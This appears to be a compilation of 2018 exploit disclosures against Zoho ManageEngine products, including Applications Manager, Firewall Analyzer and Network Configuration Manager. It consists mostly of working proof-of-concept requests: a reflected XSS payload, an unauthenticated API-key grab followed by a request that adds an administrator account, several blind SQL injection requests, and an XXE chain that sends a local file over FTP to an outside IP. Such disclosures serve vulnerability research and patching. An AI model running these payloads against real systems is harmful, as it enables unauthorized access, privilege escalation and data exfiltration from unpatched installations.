Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS

Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE:CVE-2018-15169

I found a Reflected XSS in the Zoho ManageEngine Applications Manager 13 (13810 build) via the method parameter in /deleteMO.do?listview=true&method=deleteMO&viewmontype= GET request.

Proof of Concept

/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(document.domain)</script>//&viewmontype=

Local test:

Demo site test:

Notice: This vul can reproduce without login.

The vendor has fixed the vulnerability：
https://www.manageengine.com/products/applications_manager/issues.html

Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection

Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]

Firewall Analyzer 12.3 Build 123183 has permission bypass Vulnerability which can lead to information disclosure and SQL injection

Proof of Concept:

Getting the apikey unauthorizedly:

GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

Local site test:

Add the admin user by only using the apikey poc:

POST /api/json/v2/admin/addUser?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&[email protected]&privilege=Administrator&[email protected]&landLine=1&mobileNo=1&sipenabled=true&tZone=Asia/Irkutsk&allDevices=true&authentication=local&fwaresources=&ncmallDevices=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US;q=0.8,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/apiclient/ember/index.jsp
Content-Length: 566
Content-Type: multipart/form-data; boundary=---------------------------195342410120122
Connection: close

-----------------------------195342410120122
Content-Disposition: form-data; name="DevGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="IPGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="InterfaceGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="password"

test123
-----------------------------195342410120122
Content-Disposition: form-data; name="profileImg"

undefined
-----------------------------195342410120122--

Local site test:

Sql injection by only using the apikey poc:

POST /api/json/device/setManaged?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&manage=false HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.159.1:80
Host: 192.168.159.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

name=KcP7OGhC';select%20pg_sleep(1);%20-- 

Zoho manageengine Applications Manager SQL Injection vulnerability

Date: 2018/07/02
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-13050

Proof of Concept:

POST /j_security_check HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9090/
Cookie: JSESSIONID_APM_9090=CFE9FA9A1A9EF400DC88681BF3F580F4; testcookie=; am_username=; am_check=
Host: 127.0.0.1:9090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=Login&clienttype=html&j_password=g00dPa%24%24w0rD&j_username=5mwETOWO';select%20pg_sleep(0);%20--%20&remember=on&ScreenHeight=709&ScreenWidth=1280&username=rrkfpycm&webstart=

This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.

Databases:

User:

Table:

data:

Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]

A XML External Entity injection(XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.

My vps’s evil.xml

<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;

I used the Ftp protocol to read file, it can read the file c:\test.txt.

The test.txt is just for test.

Then i used the poc to request my vps’s evil.xml.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>

The vulnerability exists in the /devices/ProcessRequest.do?RequestID=463&RequestXML=,so i tested it by the poc which was urlencoded.

http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E

In my vps ,i used the python script to open ftp protocol for accepting data

When i sent the request , I accepted the content of test.txt in my vps.

Zoho manageengine Applications Manager SQL Injection vulnerability

Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE:CVE-2018-15168

I found a sql injection in the Zoho ManageEngine Applications Manager 13 (13810 build) via the resids parameter in /editDisplaynames.domethod=editDisplaynames&resids=1 GET request.

Proof of Concept:

GET /editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: close

This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.

To get the admin'spassword:

The vendor has fixed the vulnerability：
https://www.manageengine.com/products/applications_manager/issues.html